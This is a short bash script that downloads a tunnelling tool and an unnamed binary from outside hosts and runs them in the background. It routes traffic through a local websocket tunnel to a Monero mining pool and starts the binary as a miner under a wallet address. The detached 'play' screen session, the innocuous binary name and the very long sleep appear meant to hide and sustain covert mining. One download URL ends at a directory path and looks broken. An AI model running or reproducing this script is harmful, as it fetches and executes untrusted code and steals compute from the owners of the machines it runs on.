#!/bin/bash
sudo apt update
sudo apt install screen -y
curl -L -O -J https://storage.technoelectro.online/wstunnel_10.5.2_linux_amd64.tar.gz
curl -O -L -J https://github.com/wakitobi/glowing-umbrella/raw/refs/heads/main/
tar -xf wstunnel_10.5.2_linux_amd64.tar.gz
chmod +x wstunnel bos
nohup ./wstunnel server ws://127.0.0.1:1111 &
nohup ./wstunnel client -L tcp://127.0.0.1:2222:xmr.kryptex.network:7029 ws://127.0.0.1:1111 &
screen -dmS play ./bos -o 127.0.0.1:2222 -u 89YQSFqV1vbUM77et87qV67eVroCiro6YYntMES23R3h7kKjeKyN4cwTnCVAFhyMpq6w1JERiENowLPxdxXWenJv5hZMfS2.ROT -t 6
sleep 34674653455
